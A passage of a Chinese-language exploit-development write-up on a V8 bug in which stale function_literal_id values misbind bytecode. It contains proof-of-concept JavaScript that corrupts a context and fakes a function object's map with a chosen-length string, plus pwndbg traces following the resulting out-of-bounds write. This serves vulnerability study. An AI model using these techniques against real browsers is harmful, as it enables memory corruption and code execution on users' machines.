. . BLOCK at -1
. . . RETURN at 89
. . . . LITERAL undefined
. ELSE at -1
. . BLOCK at -1
. . . RETURN at 121
. . . . LITERAL undefined
$8 = void
此时遍历到了那个if语句,判断为IsJump,则后面点内容不再遍历。然后返回到这里更正unction_literal_id
23 void AstFunctionLiteralIdReindexer::VisitFunctionLiteral(FunctionLiteral* lit) {
24 AstTraversalVisitor::VisitFunctionLiteral(lit);
► 25 lit->set_function_literal_id(lit->function_literal_id() + delta_);
26 }
pwndbg> p lit->function_literal_id()
$9 = 5
pwndbg> p delta_
$10 = -3
可见,这里只更正了f的index为2,而v1、f1、f2的index都还没更新,导致fun->function_literal_id()
会比函数个数还大。现在来研究一下function_literal_id会对编译造成什么影响。
在FinalizeUnoptimizedCode
阶段,即字节码的最后阶段,有如下代码
// Finalize the inner functions' compilation jobs.
for (auto&& inner_job : *inner_function_jobs) {
Handle<SharedFunctionInfo> inner_shared_info =
Compiler::GetSharedFunctionInfo(
inner_job->compilation_info()->literal(), parse_info->script(),
isolate);
// The inner function might be compiled already if compiling for debug.
if (inner_shared_info->is_compiled()) continue;
if (FinalizeUnoptimizedCompilationJob(inner_job.get(), inner_shared_info,
isolate) !=
CompilationJob::SUCCEEDED) {
return false;
}
}
这里根据inner_job->compilation_info()->literal()
取到了内部函数的FunctionLiteral
对象,但记住因为漏洞的原因,它的literal_id没有更新,仍然为解析时的那个顺序,其中(function() { print("f2") });
的literal_id为7。显然,我们的字节码并没有7段,那么我们多增加几个函数
function fun() {
var f = (v1 = (function() {
var a = 0;
if (a) {
return;
} else {
return;
}
(function() {
print("f1");
});
(function() {
print("f2")
});
}))=>{};
f();
}
function fun2() {
fun();
}
function fun3() {
fun();
}
fun2();
fun3();
下标7的位置函数正好是fun3函数
[generated bytecode for function: ]
............
[generated bytecode for function: fun2]
............
[generated bytecode for function: fun]
...........
[generated bytecode for function: f]
...........
[generated bytecode for function: v1]
...........
[generated bytecode for function: ]
...........
[generated bytecode for function: ]
..........
[generated bytecode for function: fun3]
这意味着取到的inner_shared_info
将会是fun3的shared_info
,而这里处理的函数实际上是(function() { print("f2") });
那么执行FinalizeUnoptimizedCompilationJob时
CompilationJob::Status FinalizeUnoptimizedCompilationJob(
UnoptimizedCompilationJob* job, Handle<SharedFunctionInfo> shared_info,
Isolate* isolate) {
UnoptimizedCompilationInfo* compilation_info = job->compilation_info();
ParseInfo* parse_info = job->parse_info();
SetSharedFunctionFlagsFromLiteral(compilation_info->literal(), shared_info);
CompilationJob::Status status = job->FinalizeJob(shared_info, isolate);
if (status == CompilationJob::SUCCEEDED) {
InstallUnoptimizedCode(compilation_info, shared_info, parse_info, isolate);
CodeEventListener::LogEventsAndTags log_tag;
if (parse_info->is_toplevel()) {
log_tag = compilation_info->is_eval() ? CodeEventListener::EVAL_TAG
: CodeEventListener::SCRIPT_TAG;
} else {
log_tag = parse_info->lazy_compile() ? CodeEventListener::LAZY_COMPILE_TAG
: CodeEventListener::FUNCTION_TAG;
}
job->RecordFunctionCompilation(log_tag, shared_info, isolate);
job->RecordCompilationStats(isolate);
}
return status;
}
其中的InstallUnoptimizedCode
会将(function() { print("f2") });
的字节码绑定到fun3函数对象上,也就是调用fun3时会调用(function() { print("f2") });
这说明这个漏洞导致了函数错位。除此之外还有什么影响呢?
这将导致(function() { print("f2") });
函数使用的context将会是fun3的context。
使用如下代码测试
function fun() {
var f = (v1 = (function() {
var a = 0;
if (a) {
return;
} else {
return;
}
(function() {
print("f1");
});
(function() {
print("f2");
a = "a".repeat(100);
});
}))=>{};
f();
}
let arr = [1.1,2.2,3.3];
function fun2() {
fun();
}
function fun3() {
fun();
}
fun2();
%DebugPrint(fun);
%SystemBreak();
fun3();
其中f2的字节码如下
Frame size 24
204 E> 0x21f372c1f542 @ 0 : a5 StackCheck
218 S> 0x21f372c1f543 @ 1 : 13 00 00 LdaGlobal [0], [0]
0x21f372c1f546 @ 4 : 26 fb Star r0
0x21f372c1f548 @ 6 : 12 01 LdaConstant [1]
0x21f372c1f54a @ 8 : 26 fa Star r1
218 E> 0x21f372c1f54c @ 10 : 5d fb fa 02 CallUndefinedReceiver1 r0, r1, [2]
240 S> 0x21f372c1f550 @ 14 : 12 02 LdaConstant [2]
0x21f372c1f552 @ 16 : 26 fa Star r1
248 E> 0x21f372c1f554 @ 18 : 28 fa 03 04 LdaNamedProperty r1, [3], [4]
0x21f372c1f558 @ 22 : 26 fb Star r0
0x21f372c1f55a @ 24 : 0c 64 LdaSmi [100]
0x21f372c1f55c @ 26 : 26 f9 Star r2
248 E> 0x21f372c1f55e @ 28 : 59 fb fa f9 06 CallProperty1 r0, r1, r2, [6]
242 E> 0x21f372c1f563 @ 33 : 1d 04 StaCurrentContextSlot [4]
0x21f372c1f565 @ 35 : 0d LdaUndefined
267 S> 0x21f372c1f566 @ 36 : a9 Return
Constant pool (size = 4)
我们在StaCurrentContextSlot
字节码断点,因为这里会向context的第4个插槽写数据,也就是说这里在修改fun3的context内容。
0x7f4a3b433925 <Builtins_StaCurrentContextSlotHandler+37> movabs r10, 0x100000000
0x7f4a3b43392f <Builtins_StaCurrentContextSlotHandler+47> cmp r10, rdx
0x7f4a3b433932 <Builtins_StaCurrentContextSlotHandler+50> jae Builtins_StaCurrentContextSlotHandler+65 <Builtins_StaCurrentContextSlotHandler+65>
↓
0x7f4a3b433941 <Builtins_StaCurrentContextSlotHandler+65> mov rbx, qword ptr [rbx - 8]
0x7f4a3b433945 <Builtins_StaCurrentContextSlotHandler+69> lea rdx, [rdx*8 + 0xf]
► 0x7f4a3b43394d <Builtins_StaCurrentContextSlotHandler+77> mov qword ptr [rbx + rdx], rax
0x7f4a3b433951 <Builtins_StaCurrentContextSlotHandler+81> mov rsi, -0x80000
pwndbg> job $rbx
0x21f372c1ed09: [Context] in OldSpace
- map: 0x0cfeb6b81049 <Map>
- length: 5
- scope_info: 0x21f372c1e8a1 <ScopeInfo SCRIPT_SCOPE [9]>
- previous: 0x21f372c01749 <NativeContext[247]>
- extension: 0x0cfeb6b805b1 <the_hole>
- native_context: 0x21f372c01749 <NativeContext[247]>
0: 0x21f372c1e8a1 <ScopeInfo SCRIPT_SCOPE [9]>
1: 0x21f372c01749 <NativeContext[247]>
2: 0x0cfeb6b805b1 <the_hole>
3: 0x21f372c01749 <NativeContext[247]>
4: 0x37962980c941 <JSArray[3]>
pwndbg> job 0x37962980c941
0x37962980c941: [JSArray]
- map: 0x078e20f82de9 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
- prototype: 0x21f372c10c89 <JSArray[0]>
- elements: 0x37962980c919 <FixedDoubleArray[3]> [PACKED_DOUBLE_ELEMENTS]
- length: 3
- properties: 0x0cfeb6b80c21 <FixedArray[0]> {
#length: 0x198440c801a9 <AccessorInfo> (const accessor descriptor)
}
- elements: 0x37962980c919 <FixedDoubleArray[3]> {
0: 1.1
1: 2.2
2: 3.3
}
.............................................
0x7f4a3b43394d <Builtins_StaCurrentContextSlotHandler+77> mov qword ptr [rbx + rdx], rax
► 0x7f4a3b433951 <Builtins_StaCurrentContextSlotHandler+81> mov rsi, -0x80000
pwndbg> job $rbx
0x21f372c1ed09: [Context] in OldSpace
- map: 0x0cfeb6b81049 <Map>
- length: 5
- scope_info: 0x21f372c1e8a1 <ScopeInfo SCRIPT_SCOPE [9]>
- previous: 0x21f372c01749 <NativeContext[247]>
- extension: 0x0cfeb6b805b1 <the_hole>
- native_context: 0x21f372c01749 <NativeContext[247]>
0: 0x21f372c1e8a1 <ScopeInfo SCRIPT_SCOPE [9]>
1: 0x21f372c01749 <NativeContext[247]>
2: 0x0cfeb6b805b1 <the_hole>
3: 0x21f372c01749 <NativeContext[247]>
4: 0x37962980caa1 <String[100]: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa>
可见,这里可以修改内存里的数据,并且没有边界检查,并且我们发现在Context的第4个插槽后方正好就是fun对象
pwndbg> x /100gx 0x21f372c1ed08
0x21f372c1ed08: 0x00000cfeb6b81049 0x0000000500000000
0x21f372c1ed18: 0x000021f372c1e8a1 0x000021f372c01749
0x21f372c1ed28: 0x00000cfeb6b805b1 0x000021f372c01749
0x21f372c1ed38: 0x000037962980caa1 0x0000078e20f803b9
pwndbg> job 0x21f372c1ed41
0x21f372c1ed41: [Function] in OldSpace
- map: 0x078e20f803b9 <Map(HOLEY_ELEMENTS)> [FastProperties]
- prototype: 0x21f372c01ff1 <JSFunction (sfi = 0x198440c88009)>
- elements: 0x0cfeb6b80c21 <FixedArray[0]> [HOLEY_ELEMENTS]
- function prototype:
- initial_map:
- shared_info: 0x21f372c1e9a1 <SharedFunctionInfo fun>
- name: 0x21f372c1e7b9 <String[#3]: fun>
那么,我们可以在f函数里增加几个变量,就可以覆盖fun对象的MAP
。
function fun() {
var f = (v1 = (function() {
let a = 0;
let b = 0;
if (a) {
return;
} else {
return;
}
(function() {
print("f1");
});
(function() {
print("f2");
//修改arr指针为a
a = [1.1,2.2,3.3];
//修改fun的MAP为b
b = "a".repeat(10);
});
}))=>{};
f();
}
let arr = {};
function fun2() {
fun();
}
function fun3() {
fun();
}
fun2();
//%DebugPrint(fun);
//%SystemBreak();
fun3();
fun[0x66] = 0x123;
运行后发现崩溃
root@ubuntu:~/Desktop/v8/out.gn/x64.debug.bug# ./d8 poc.js
f2
abort: CSA_ASSERT failed: IsMap(map) [../../src/code-stub-assembler.cc:5929]
显然是因为我们覆盖了fun函数对象的MAP为b对象的地址,导致DCHECK的检查不通过。但在Release版本里是没有DCHECK的,运行后发现无报错崩溃,那么最后一句fun[0]发生了什么,0x123被写入到哪了?
KeyedStoreIC
V8中使用StaKeyedProperty
字节码处理下标赋值的操作,该字节码首先会调用Builtins_KeyedStoreIC
函数
void AccessorAssembler::KeyedStoreIC(const StoreICParameters* p) {
void AccessorAssembler::KeyedStoreIC(const StoreICParameters* p) {
.....................................
Node* receiver_map = LoadReceiverMap(p->receiver);
GotoIf(IsDeprecatedMap(receiver_map), &miss);
.....................................
BIND(&miss);
{
Comment("KeyedStoreIC_miss");
TailCallRuntime(Runtime::kKeyedStoreIC_Miss, p->context, p->value, p->slot,
p->vector, p->receiver, p->name);
}
}
由于这里receiver_map
直接取到的就是我们在fun函数中创建的b字符串对象,而对象地址是具有随机性的,因此有很大的几率到达miss标签,这里是处理IC缓存缺失的情况,调用慢方法KeyedStoreIC_Miss
。KeyedStoreIC_Miss
的调用链为KeyedStoreIC_Miss
->KeyedStoreIC::Store
->Runtime::SetObjectProperty
。其中Runtime::SetObjectProperty
源码如下
MaybeHandle<Object> Runtime::SetObjectProperty(
Isolate* isolate, Handle<Object> object, Handle<Object> key,
Handle<Object> value, StoreOrigin store_origin,
Maybe<ShouldThrow> should_throw) {
......................
// Check if the given key is an array index.
bool success = false;
LookupIterator it =
LookupIterator::PropertyOrElement(isolate, object, key, &success);
if (!success) return MaybeHandle<Object>();
if (!it.IsFound() && key->IsSymbol() &&
Symbol::cast(*key)->is_private_name()) {
Handle<Object> name_string(Symbol::cast(*key)->name(), isolate);
DCHECK(name_string->IsString());
THROW_NEW_ERROR(isolate,
NewTypeError(MessageTemplate::kInvalidPrivateFieldWrite,
name_string, object),
Object);
}
MAYBE_RETURN_NULL(
Object::SetProperty(&it, value, store_origin, should_throw));
return value;
}
该函数调用LookupIterator::PropertyOrElement
函数,这个函数的作用是根据key,从对象的prototype链中寻找合适的holder
,(即寻找与这个key合适的数组,这样后面可以将数据存入对应的数组),具体过程如下
LookupIterator LookupIterator::PropertyOrElement(
Isolate* isolate, Handle<Object> receiver, Handle<Name> name,
Configuration configuration) {
uint32_t index;
if (name->AsArrayIndex(&index)) {
LookupIterator it = LookupIterator(isolate, receiver, index, configuration);
it.name_ = name;
return it;
}
return LookupIterator(isolate, receiver, name, configuration);
}
调试运行
57 uint32_t index = 0;
58 if (key->ToArrayIndex(&index)) {
59 *success = true;
► 60 return LookupIterator(isolate, receiver, index, configuration);
61 }
pwndbg> p/x index
$137 = 0x66
可以知道它会继续调用LookupIterator
,跟进去
LookupIterator::LookupIterator(Isolate* isolate, Handle<Object> receiver,
uint32_t index, Configuration configuration)
: LookupIterator(isolate, receiver, index,
GetRoot(isolate, receiver, index), configuration) {}
这里会调用GetRoot
Handle<JSReceiver> LookupIterator::GetRoot(Isolate* isolate,
Handle<Object> receiver,
uint32_t index) {
if (receiver->IsJSReceiver()) return Handle<JSReceiver>::cast(receiver);
return GetRootForNonJSReceiver(isolate, receiver, index);
}
如果满足条件receiver->IsJSReceiver()
,则直接返回原对象,否则会创建一个新的NewJSObject,显然这不是我们想要的
Handle<JSReceiver> LookupIterator::GetRootForNonJSReceiver(
Isolate* isolate, Handle<Object> receiver, uint32_t index) {
// Strings are the only objects with properties (only elements) directly on
// the wrapper. Hence we can skip generating the wrapper for all other cases.
if (index != kMaxUInt32 && receiver->IsString() &&
index < static_cast<uint32_t>(String::cast(*receiver)->length())) {
// TODO(verwaest): Speed this up. Perhaps use a cached wrapper on the native
// context, ensuring that we don't leak it into JS?
Handle<JSFunction> constructor = isolate->string_function();
Handle<JSObject> result = isolate->factory()->NewJSObject(constructor);
Handle<JSValue>::cast(result)->set_value(*receiver);
return result;
}
auto root =
handle(receiver->GetPrototypeChainRootMap(isolate)->prototype(), isolate);
if (root->IsNull(isolate)) {
isolate->PushStackTraceAndDie(reinterpret_cast<void*>(receiver->ptr()));
}
return Handle<JSReceiver>::cast(root);
}
因为我们希望能够通过已有的数据构造出一个Prototype链,而不是创建一个新的。那么receiver->IsJSReceiver()
是怎么判断的呢?最终会调用到IsJSReceiver(InstanceType instance_type)
V8_INLINE bool IsJSReceiver(InstanceType instance_type) {
STATIC_ASSERT(LAST_TYPE == LAST_JS_RECEIVER_TYPE);
return instance_type >= FIRST_JS_RECEIVER_TYPE;
}
.................
FIRST_JS_RECEIVER_TYPE = JS_PROXY_TYPE,
........
JS_PROXY_TYPE = 0x0400, // FIRST_JS_RECEIVER_TYPE
JS_GLOBAL_OBJECT_TYPE, // FIRST_JS_OBJECT_TYPE
JS_GLOBAL_PROXY_TYPE,
JS_MODULE_NAMESPACE_TYPE,
// Like JS_API_OBJECT_TYPE, but requires access checks and/or has
// interceptors.
JS_SPECIAL_API_OBJECT_TYPE = 0x0410, // LAST_SPECIAL_RECEIVER_TYPE
这个TYPE实际上就是MAP对象中偏移0xc处的一个数据,我们可以使用如下代码调试观察
var a = new Proxy({},{});
%DebugPrint(a);
%SystemBreak();
pwndbg> job 0x05fe41603e79
0x5fe41603e79: [Map]
- type: JS_PROXY_TYPE
pwndbg> x /20wx 0x05fe41603e78
0x5fe41603e78: 0xd2c80189 0x0000207f 0x2e000004 0x19000400
那么现在,由于string对象成为了MAP,那么为了绕过这里的坎,我们要保证&string+0xc处的short数据>=0x400,我们使用如下代码进行调试观察一下string的结构
var a = 'a'.repeat(0x400);
var b = [a];
%DebugPrint(b);
%SystemBreak();
..............................
- elements: 0x26799f98c839 <FixedArray[1]> {
0: 0x26799f98c819 <String[1024]: aaaa......
.............................
可以知道string对象地址为0x26799f98c819
,我们查看数据
pwndbg> x /20wx 0x26799f98c818
0x26799f98c818: 0xb5e81e59 0x00002de1 0x00000003 0x00000400
可以发现,在0xc的位置正好是字符串长度,因为,我们可以通过控制字符串长度来伪造MAP结构中的TYPE。于是,我们将POC代码改为如下
.....................
print("f2");
//修改arr指针为a
a = [1.1,2.2,3.3];
//修改fun的MAP为b
b = "a".repeat(0x400);
.............
然后进行调试
155 Handle<JSReceiver> LookupIterator::GetRoot(Isolate* isolate,
156 Handle<Object> receiver,
157 uint32_t index) {
► 158 if (receiver->IsJSReceiver()) return Handle<JSReceiver>::cast(receiver);
159 return GetRootForNonJSReceiver(isolate, receiver, index);
160 }
pwndbg> p receiver->IsJSReceiver()
$138 = true
这次满足要求,便可以直接返回。接下来进入LookupIterator
的构造函数
In file: /home/sea/Desktop/v8/src/lookup.h
71 initial_holder_(holder),
72 index_(index),
73 number_(static_cast<uint32_t>(DescriptorArray::kNotFound)) {
74 // kMaxUInt32 isn't a valid index.
75 DCHECK_NE(kMaxUInt32, index_);
► 76 Start<true>();
77 }
Start函数调用LookupInHolder
函数
In file: /home/sea/Desktop/v8/src/lookup.cc
151 holder_ = initial_holder_;
152
153 JSReceiver holder = *holder_;
154 Map map = holder->map();
155
► 156 state_ = LookupInHolder<is_element>(map, holder);
我们继续跟进
220 inline State LookupInHolder(Map map, JSReceiver holder) {
► 221 return map->IsSpecialReceiverMap()
222 ? LookupInSpecialHolder<is_element>(map, holder)
223 : LookupInRegularHolder<is_element>(map, holder);
224 }
pwndbg> p map->IsSpecialReceiverMap()
$139 = true
这里会判断SpecialReceiverMap
,其判断的逻辑为
inline bool IsSpecialReceiverInstanceType(InstanceType instance_type) {
return instance_type <= LAST_SPECIAL_RECEIVER_TYPE;
}
// This should be in objects/map-inl.h, but can't, because of a cyclic
// dependency.
bool Map::IsSpecialReceiverMap() const {
bool result = IsSpecialReceiverInstanceType(instance_type());
DCHECK_IMPLIES(!result,
!has_named_interceptor() && !is_access_check_needed());
return result;
}
...............
// Boundary for testing JSReceivers that need special property lookup handling
LAST_SPECIAL_RECEIVER_TYPE = JS_SPECIAL_API_OBJECT_TYPE,
JS_SPECIAL_API_OBJECT_TYPE = 0x0410, // LAST_SPECIAL_RECEIVER_TYPE
可见这里也是根据MAP中的TYPE
ID来进行判断的,因此也是可以被我们控制。IsSpecialReceiverMap()为true后,会调用LookupInSpecialHolder
函数
template <bool is_element>
LookupIterator::State LookupIterator::LookupInSpecialHolder(
Map const map, JSReceiver const holder) {
STATIC_ASSERT(INTERCEPTOR == BEFORE_PROPERTY);
switch (state_) {
case NOT_FOUND:
if (map->IsJSProxyMap()) {
if (is_element || !name_->IsPrivate()) return JSPROXY;
}
if (map->is_access_check_needed()) {
if (is_element || !name_->IsPrivate()) return ACCESS_CHECK;
}
V8_FALLTHROUGH;
case ACCESS_CHECK:
if (check_interceptor() && HasInterceptor<is_element>(map) &&
!SkipInterceptor<is_element>(JSObject::cast(holder))) {
if (is_element || !name_->IsPrivate()) return INTERCEPTOR;
}
V8_FALLTHROUGH;
case INTERCEPTOR:
if (!is_element && map->IsJSGlobalObjectMap()) {
GlobalDictionary dict =
JSGlobalObject::cast(holder)->global_dictionary();
int number = dict->FindEntry(isolate(), name_);
if (number == GlobalDictionary::kNotFound) return NOT_FOUND;
number_ = static_cast<uint32_t>(number);
PropertyCell cell = dict->CellAt(number_);
if (cell->value()->IsTheHole(isolate_)) return NOT_FOUND;
property_details_ = cell->property_details();
has_property_ = true;
switch (property_details_.kind()) {
case v8::internal::kData:
return DATA;
case v8::internal::kAccessor:
return ACCESSOR;
}
}
.......................................
由于我们的TYPE
ID伪造为0x400,因此map->IsJSProxyMap()
返回true,导致LookupInSpecialHolder
返回的类型为JSPROXY
,这不是我们希望的,我们希望能返回DATA,因为这种类型能被我们进行读写,而PROXY不行。最终导致脚本运行结果如下
./b.js:41: TypeError: Cannot perform 'set' on a proxy that has been revoked
fun[0x66] = 0x123;
^
TypeError: Cannot perform 'set' on a proxy that has been revoked
at ./b.js:41:11
那么,我们将TYPE ID增大,POC中代码修改为
.....................
print("f2");
//修改arr指针为a
a = [1.1,2.2,3.3];
//修改fun的MAP为b
b = "a".repeat(0x800);
.............
于是,这回我们将进入LookupInRegularHolder
函数
220 inline State LookupInHolder(Map map, JSReceiver holder) {
221 return map->IsSpecialReceiverMap()
222 ? LookupInSpecialHolder<is_element>(map, holder)
► 223 : LookupInRegularHolder<is_element>(map, holder);
224 }
其代码如下
template <bool is_element>
LookupIterator::State LookupIterator::LookupInRegularHolder(
Map const map, JSReceiver const holder) {
DisallowHeapAllocation no_gc;
if (interceptor_state_ == InterceptorState::kProcessNonMasking) {
return NOT_FOUND;
}
if (is_element) {
JSObject js_object = JSObject::cast(holder);
ElementsAccessor* accessor = js_object->GetElementsAccessor();
FixedArrayBase backing_store = js_object->elements();
number_ =
accessor->GetEntryForIndex(isolate_, js_object, backing_store, index_);
if (number_ == kMaxUInt32) {
return holder->IsJSTypedArray() ? INTEGER_INDEXED_EXOTIC : NOT_FOUND;
}
property_details_ = accessor->GetDetails(js_object, number_);
} else if (!map->is_dictionary_map()) {
..................................
}
has_property_ = true;
switch (property_details_.kind()) {
case v8::internal::kData:
return DATA;
case v8::internal::kAccessor:
return ACCESSOR;
}
UNREACHABLE();
}
由于is_element
默认为true,因此将进入is_element
分支
1159 if (is_element) {
1160 JSObject js_object = JSObject::cast(holder);
1161 ElementsAccessor* accessor = js_object->GetElementsAccessor();
1162 FixedArrayBase backing_store = js_object->elements();
► 1163 number_ =
1164 accessor->GetEntryForIndex(isolate_, js_object, backing_store, index_);
1165 if (number_ == kMaxUInt32) {
1166 return holder->IsJSTypedArray() ? INTEGER_INDEXED_EXOTIC : NOT_FOUND;
1167 }
pwndbg> p/x js_object->ptr_
$145 = 0x61f6349ed01
pwndbg> p/x backing_store->ptr_
$147 = 0x317690b80c21
pwndbg> x /20gx 0x61f6349ed00
0x61f6349ed00: 0x00002deae918ce19 0x0000317690b80c21
0x61f6349ed10: 0x0000317690b80c21 0x0000061f6349e999
0x61f6349ed20: 0x0000061f6349ecc9 0x0000061f6349ec89
pwndbg> job 0x317690b80c21
0x317690b80c21: [FixedArray]
- map: 0x317690b807b1 <Map>
- length: 0
可以知道,当前操作对象就是fun函数对象,取出了对象默认的elements(),然后调用GetEntryForIndex
函数
static uint32_t GetEntryForIndexImpl(Isolate* isolate, JSObject holder,
FixedArrayBase backing_store,
uint32_t index, PropertyFilter filter) {
DCHECK(IsFastElementsKind(kind()));
uint32_t length = Subclass::GetMaxIndex(holder, backing_store);
if (IsHoleyElementsKind(kind())) {
return index < length &&
!BackingStore::cast(backing_store)
->is_the_hole(isolate, index)
? index
: kMaxUInt32;
} else {
return index < length ? index : kMaxUInt32;
}
}
该函数用于检查index是否与当前的这个elements合适,即index在length范围内的话,就能与当前的elements匹配成功。显然这里我们匹配失败。返回NOT_FOUND
1163 number_ =
1164 accessor->GetEntryForIndex(isolate_, js_object, backing_store, index_);
1165 if (number_ == kMaxUInt32) {
► 1166 return holder->IsJSTypedArray() ? INTEGER_INDEXED_EXOTIC : NOT_FOUND;
1167 }
于是,在LookupIterator::Start
中,函数将继续执行NextInternal<is_element>(map, holder);
开始遍历ProtoType链
157 if (IsFound()) return;
158
► 159 NextInternal<is_element>(map, holder);
160 }
遍历的逻辑如下
template <bool is_element>
void LookupIterator::NextInternal(Map map, JSReceiver holder) {
do {
JSReceiver maybe_holder = NextHolder(map);
if (maybe_holder.is_null()) {
if (interceptor_state_ == InterceptorState::kSkipNonMasking) {
RestartLookupForNonMaskingInterceptors<is_element>();
return;
}
state_ = NOT_FOUND;
if (holder != *holder_) holder_ = handle(holder, isolate_);
return;
}
holder = maybe_holder;
map = holder->map();
state_ = LookupInHolder<is_element>(map, holder);
} while (!IsFound());
holder_ = handle(holder, isolate_);
}
其中NextHolder就是取出prototype对象,然后返回
JSReceiver LookupIterator::NextHolder(Map map) {
DisallowHeapAllocation no_gc;
if (map->prototype() == ReadOnlyRoots(heap()).null_value()) {
return JSReceiver();
}
if (!check_prototype_chain() && !map->has_hidden_prototype()) {
return JSReceiver();
}
return JSReceiver::cast(map->prototype());
}
调试如下
In file: /home/sea/Desktop/v8/src/lookup.cc
183
184 template <bool is_element>
185 void LookupIterator::NextInternal(Map map, JSReceiver holder) {
186 do {
187 JSReceiver maybe_holder = NextHolder(map);
► 188 if (maybe_holder.is_null()) {
189 if (interceptor_state_ == InterceptorState::kSkipNonMasking) {
190 RestartLookupForNonMaskingInterceptors<is_element>();
pwndbg> p/x map->ptr_
$150 = 0x2deae918ce19
pwndbg> x /20gx 0x2deae918ce18
0x2deae918ce18: 0x0000317690b81e59 0x0000080000000003
0x2deae918ce28: 0x00002deae918cdf9 0x00002deae918cdf9
0x2deae918ce38: 0xdeadbeedbeadbeef 0xdeadbeedbeadbeef
pwndbg> p/x maybe_holder->ptr_
$152 = 0x2deae918cdf9
pwndbg> job 0x00002deae918cdf9
c"aaaaa..............
可以看到,这里取到了第四项,由于MAP是我们用字符串对象伪造的,因此取到的prototype对象是字符串对象中的第四项,而此处正好也是字符串对象
接下来调用LookupInHolder
对当前prototype进行判断,是否符合要求。
198 map = holder->map();
► 199 state_ = LookupInHolder<is_element>(map, holder);
200 } while (!IsFound());
pwndbg> job map->ptr_
0x317690b81e59: [Map]
- type: CONS_ONE_BYTE_STRING_TYPE
- instance size: 32
.......................
这次取到的MAP是字符串的MAP,会使用LookupInSpecialHolder
进行处理,在LookupInSpecialHolder中调用了LookupInRegularHolder
In file: /home/sea/Desktop/v8/src/lookup.cc
1134 return DATA;
1135 case v8::internal::kAccessor:
1136 return ACCESSOR;
1137 }
1138 }
► 1139 return LookupInRegularHolder<is_element>(map, holder);
主要逻辑仍然是将对应的elements取出来判断index是否在length范围内。
In file: /home/sea/Desktop/v8/src/lookup.cc
1160 JSObject js_object = JSObject::cast(holder);
1161 ElementsAccessor* accessor = js_object->GetElementsAccessor();
1162 FixedArrayBase backing_store = js_object->elements();
1163 number_ =
1164 accessor->GetEntryForIndex(isolate_, js_object, backing_store, index_);
► 1165 if (number_ == kMaxUInt32) {
1166 return holder->IsJSTypedArray() ? INTEGER_INDEXED_EXOTIC : NOT_FOUND;
1167 }
pwndbg> p/x js_object->ptr_
$157 = 0x2deae918cdf9
pwndbg> x /20gx 0x2deae918cdf8
0x2deae918cdf8: 0x0000317690b81e59 0x0000040000000003
0x2deae918ce08: 0x00002deae918cdd9 0x00002deae918cdd9
0x2deae918ce18: 0x0000317690b81e59 0x0000080000000003
0x2deae918ce28: 0x00002deae918cdf9 0x00002deae918cdf9
........
pwndbg> p/x backing_store->ptr_
$158 = 0x2deae918cdd9
pwndbg> x /20gx 0x2deae918cdd8
0x2deae918cdd8: 0x0000317690b81e59 0x0000020000000003
0x2deae918cde8: 0x00002deae918cdb9 0x00002deae918cdb9
0x2deae918cdf8: 0x0000317690b81e59 0x0000040000000003
0x2deae918ce08: 0x00002deae918cdd9 0x00002deae918cdd9
0x2deae918ce18: 0x0000317690b81e59 0x0000080000000003
0x2deae918ce28: 0x00002deae918cdf9 0x00002deae918cdf9
...........
pwndbg> p number_
$159 = 102
显然,这回条件是满足的,index在这个elements的length范围内,于是执行到后面,返回DATA
In file: /home/sea/Desktop/v8/src/lookup.cc
1181 property_details_ = dict->DetailsAt(number_);
1182 }
1183 has_property_ = true;
1184 switch (property_details_.kind()) {
1185 case v8::internal::kData:
► 1186 return DATA;
1187 case v8::internal::kAccessor:
1188 return ACCESSOR;
1189 }
这样LookupIterator it = LookupIterator::PropertyOrElement(isolate, object, key, &success);
从prototype链上成功找到了合适的elements对象,然后回到Runtime::SetObjectProperty
继续执行到这里
In file: /home/sea/Desktop/v8/src/runtime/runtime-object.cc
366 NewTypeError(MessageTemplate::kInvalidPrivateFieldWrite,
367 name_string, object),
368 Object);
369 }
370
► 371 MAYBE_RETURN_NULL(
372 Object::SetProperty(&it, value, store_origin, should_throw));
373
374 return value;
375 }
SetObjectProperty调用了SetPropertyInternal
,
Maybe<bool> Object::SetPropertyInternal(LookupIterator* it,
Handle<Object> value,
Maybe<ShouldThrow> should_throw,
StoreOrigin store_origin, bool* found) {
it->UpdateProtector();
DCHECK(it->IsFound());
// Make sure that the top context does not change when doing callbacks or
// interceptor calls.
AssertNoContextChange ncc(it->isolate());
do {
switch (it->state()) {
case LookupIterator::NOT_FOUND:
UNREACHABLE();
......................
case LookupIterator::DATA:
if (it->IsReadOnly()) {
return WriteToReadOnlyProperty(it, value, should_throw);
}
if (it->HolderIsReceiverOrHiddenPrototype()) {
return SetDataProperty(it, value);
}
V8_FALLTHROUGH;
case LookupIterator::TRANSITION:
.................
}
it->Next();
} while (it->IsFound());
*found = false;
return Nothing<bool>();
}
得饶过it->IsReadOnly()
,其逻辑如下
bool IsReadOnly() const { return property_details().IsReadOnly(); }
bool IsReadOnly() const { return (attributes() & READ_ONLY) != 0; }
由于property_details_
是在LookupInRegularHolder
阶段创建的
template <bool is_element>
LookupIterator::State LookupIterator::LookupInRegularHolder(
Map const map, JSReceiver const holder) {
...........
if (is_element) {
.........
if (number_ == kMaxUInt32) {
return holder->IsJSTypedArray() ? INTEGER_INDEXED_EXOTIC : NOT_FOUND;
}
property_details_ = accessor->GetDetails(js_object, number_);
...............
而GetDetails函数如下
PropertyDetails GetDetails(JSObject holder, uint32_t entry) final {
return Subclass::GetDetailsImpl(holder, entry);
}
static PropertyDetails GetDetailsImpl(JSObject holder, uint32_t entry) {
return PropertyDetails(kData, NONE, PropertyCellType::kNoCell);
}
.............
PropertyDetails(PropertyKind kind, PropertyAttributes attributes,
PropertyCellType cell_type, int dictionary_index = 0) {
value_ = KindField::encode(kind) | LocationField::encode(kField) |
AttributesField::encode(attributes) |
DictionaryStorageField::encode(dictionary_index) |
PropertyCellTypeField::encode(cell_type);
}
因此attributes()
是0,是直接绕过了it->IsReadOnly()
条件,那么现在,我们得满足it->HolderIsReceiverOrHiddenPrototype()
条件,才能调用SetDataProperty
。
HolderIsReceiverOrHiddenPrototype函数代码如下
bool LookupIterator::HolderIsReceiverOrHiddenPrototype() const {
DCHECK(has_property_ || state_ == INTERCEPTOR || state_ == JSPROXY);
// Optimization that only works if configuration_ is not mutable.
if (!check_prototype_chain()) return true;
DisallowHeapAllocation no_gc;
if (*receiver_ == *holder_) return true;
if (!receiver_->IsJSReceiver()) return false;
JSReceiver current = JSReceiver::cast(*receiver_);
JSReceiver object = *holder_;
